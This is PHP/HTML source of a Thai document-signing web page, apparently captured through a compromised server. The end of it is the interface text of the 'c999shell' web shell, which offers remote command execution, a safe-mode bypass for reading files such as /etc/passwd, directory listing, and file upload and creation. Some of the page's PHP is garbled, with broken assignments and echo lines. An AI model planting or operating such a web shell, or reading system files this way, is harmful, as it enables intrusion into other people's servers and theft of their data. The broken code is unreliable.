                            <a href="signDoc.php?page_id=<?php echo $num;?>&flagshow=<? echo $flagshow?>&monthe=<? echo $monthe;?>&searchYear=<? echo $searchYear?>&searchName=<? echo $searchName?>&searchNo=<? echo $searchNo?>&searchdocdate=<? echo $searchdocdate;?>&selectdocdatevalue=<? echo $selectdocdatevalue;?>&folderstaff=<? echo $folderstaff;?>&forfolderstaff=<? echo $forfolderstaff;?>"><?php echo '[ '.a2th($num).' ]'; if($num==14){echo "<br>";}?></a>
<?php
                        
}
                    }
?>&nbsp;&nbsp;</td></tr>
          <? ?>
          </table>
                    </div></td></tr></table>
          </td></tr>
    </table><input type="hidden" name="flagshow"  id="flagshow"  value="<? echo $flagshow?>">
    <input type="hidden" name="buddy"  id="buddy"  value="<? echo $buddy?>">
    <input type="hidden" name="pgajax" id="pgajax"  value="<? echo $GLOBALS['PAGE_SIZE']; ?>">
      </form>
</fieldset> 
      <table width="99%" border="0" align="center">
        <tr> 
          <td width="134" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="1070" align="left"> <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกที่เรื่องหนังสือเพื่อลงนาม</font></td>
        </tr>
         <tr> 
          <td width="134" align="left">&nbsp;</td>
          <td colspan="2" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">ชั้นความเร็ว&nbsp;
            <? $oDsl->RSDocSpeedLevel();  while($oDsl->GetRecord()){  echo searchPicDocSpeedLevel($oDsl->DslID);  echo "&nbsp;".$oDsl->DslName."&nbsp;&nbsp;"; }?></font></td>
        </tr>
        <tr> 
          <td width="134">&nbsp;</td>
          <td colspan="2" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">ชั้นความลับ&nbsp;
            <? $oDcl->RSDocSecretLevel(); $r=0; while($oDcl->GetRecord()){  echo searchPicDocSecretLevel($oDcl->DclID);  echo "&nbsp;".$oDcl->DclName."&nbsp;&nbsp;"; }?></font></td>
        </tr>
        <tr> 
          <td width="134">&nbsp;</td>
          <td colspan="2" align="left"><img src="../picture/eDoc.gif" title="หนังสือรับอิเล็กทรอนิกส์" > <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">หมายถึงหนังสือรับอิเล็กทรอนิกส์จากหน่วยงานภายนอก</font></td>
        </tr>        
      </table>
</td>
</tr>
</table>
</body>
</html>
<? }else{ include_once "unselectposition.php"; } ?>
<?
$time_endpage 
microtime_float();
echo 
'<div align=right><font color=#AAAAAA>'.$time $time_endpage $time_startpage;
echo 
' s</font></div>';
?>
<script language="javascript">
function showDoc(){
    document.ff.submit();
}
function up_downList(status){
var mybrowser=navigator.userAgent;    
    if(status=='up'){
                if(mybrowser.indexOf('MSIE')>0){
                        closeshow.style.display='';
                        openshow.style.display='none';
                        showtable.style.display='';
                }else{
                        document.getElementById( 'closeshow' ).setAttribute( 'style', 'display:' );
                        document.getElementById( 'openshow' ).setAttribute( 'style', 'display:none' );
                        document.getElementById( 'showtable' ).setAttribute( 'style', 'display:' );        
                }        
    }else{
                if(mybrowser.indexOf('MSIE')>0){
                        openshow.style.display='';
                        closeshow.style.display='none';
                        showtable.style.display='none';
                }else{
                        document.getElementById( 'openshow' ).setAttribute( 'style', 'display:' );
                        document.getElementById( 'closeshow' ).setAttribute( 'style', 'display:none' );
                        document.getElementById( 'showtable' ).setAttribute( 'style', 'display:none' );                                                        
                }        
    }
}
function On_Month(DLCID,MaxDocGroup,DlcPS2,InputThai){
    if(document.ff.selectdocdatevalue.value!="2"){
            var date1 = document.ff.searchdocdate.value.split("/");
             y=parseInt(date1[2]);
             document.ff.searchdocdate.value=(y+543)+"-"+date1[1]+"-"+date1[0];
        
              searchYear=document.ff.searchYear.value;
              if (searchYear=="") {
              alert('กรุณากรอกปี');
              document.ff.searchYear.focus();
              return false ;
           }else{
            document.ff.flagshow.value=1;
            document.ff.selectdocdatevalue.value=1;
            ShowInfoSign(DLCID,MaxDocGroup,DlcPS2,InputThai)
            }
    }
}
function On_Year(DLCID,MaxDocGroup,DlcPS2,InputThai){
    if(document.ff.selectdocdatevalue.value!="2"){
        var date1 = document.ff.searchdocdate.value.split("/");
         y=parseInt(date1[2]);
         document.ff.searchdocdate.value=(y+543)+"-"+date1[1]+"-"+date1[0];
    
        searchYear=document.ff.searchYear.value;
        
        if (searchYear.length == 4) {
            document.ff.selectdocdatevalue.value=1;
            ShowInfoSign(DLCID,MaxDocGroup,DlcPS2,InputThai)
        }
    }
}
function changeS2(){
        if(document.ff.searchName.value==""){
            document.ff.searchName.value="";
        }
        if(document.ff.searchNo.value==""){
            document.ff.searchNo.value="";
        }    
        document.ff.submit();
}
function checkcheckbox(v){
    if(document.gg.selectpredocdatevalue.value==v){
        document.getElementById('selectpredocdate').checked=false;
        document.gg.selectpredocdatevalue.value="";
    }else{
        document.getElementById('selectpredocdate').checked=true;
        document.gg.selectpredocdatevalue.value=v;
    }
}
function presign(){
    var date1 = document.gg.searchpredocdate.value.split("/");
     y=parseInt(date1[2]);
     document.gg.searchpredocdate.value=(y+543)+"-"+date1[1]+"-"+date1[0];    
    document.gg.submit();
}
function checkradio(v){
    if(document.ff.selectdocdatevalue.value==v){
        document.getElementById('selectdocdate'+v).checked=false;
        document.ff.selectdocdatevalue.value="";
    }else{
        document.getElementById('selectdocdate'+v).checked=true;
        document.ff.selectdocdatevalue.value=v;
    }
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--